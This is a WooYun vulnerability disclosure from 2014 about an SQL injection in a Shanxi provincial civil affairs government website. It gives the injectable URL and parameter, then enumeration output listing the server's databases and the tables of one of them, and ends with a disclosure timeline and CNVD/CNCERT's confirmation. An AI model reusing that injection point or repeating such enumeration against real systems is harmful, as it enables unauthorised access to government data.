漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-053902
漏洞标题:山西民政信息网存在sql注入
相关厂商:山西民政信息网
漏洞作者: →Hack涛
提交时间:2014-03-19 18:05
修复时间:2014-05-03 18:05
公开时间:2014-05-03 18:05
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-03-19: 细节已通知厂商并且等待厂商处理中
2014-03-27: 厂商已经确认,细节仅向厂商公开
2014-04-06: 细节向核心白帽子及相关领域专家公开
2014-04-16: 细节向普通白帽子公开
2014-04-26: 细节向实习白帽子公开
2014-05-03: 细节向公众公开
简要描述:
如题
详细说明:
注入点:http://www.sxmz.gov.cn/content/topicdeal.jspid=13535&action=read
available databases [20]:
[*] [Sxzx-net]
[*] car0351
[*] honge
[*] invest
[*] ky
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] radius
[*] rhy
[*] snyon
[*] SQLAssets185
[*] sxmz
[*] sxroa
[*] sxxjcomcom
[*] tempdb
[*] tykx
[*] xnzj
漏洞证明:
其中一个表
Database: sxmz
[59 tables]
+----------------+
| ATTREC |
| BBSBOARDSORT |
| BBSINFO |
| BBSUSERSORT |
| BDBLACKLIST |
| CITY |
| COUNTRY |
| EXTRASP |
| EXTRASPITEMS |
| FLOATDCSET |
| FRAMEINFO |
| FRAMEMEMBER |
| FRAMETDATTR |
| HOMEPAGE |
| HOMEPAGEMOD |
| LMAILS |
| LMAILS_ATT |
| MYFAVORITE |
| MYFRIENDS |
| NEWSCOLLOG |
| NEWSCOLRULE |
| NEWSIMPLIST |
| NEWSSUBSCIBE |
| NEWSSUBSLIST |
| PERSONALCFG |
| PROVINCE |
| RESUBJECT |
| SP |
| SPACCEPT |
| SPADMIN |
| SPATTS |
| SPCRIT |
| SPINFO |
| SPINGRP |
| SPREC |
| SP_ATTLIMIT |
| SP_LINKS |
| STMESSAGE |
| SUBHOMEPAGE |
| SUBJECT |
| SUBJECTATT |
| SUBJECTOPTS |
| SYSINFO |
| SYSSTAT |
| SYSUSERGRADE |
| SYSUSERINI |
| UINGRP |
| USERGROUP |
| USERINFO |
| USERPERINI |
| USERSORT |
| dtproperties |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| sysconstraints |
| syssegments |
+----------------+
修复方案:
版权声明:转载请注明来源 →Hack涛@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2014-03-27 08:40
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给山西分中心处置。
最新状态:
暂无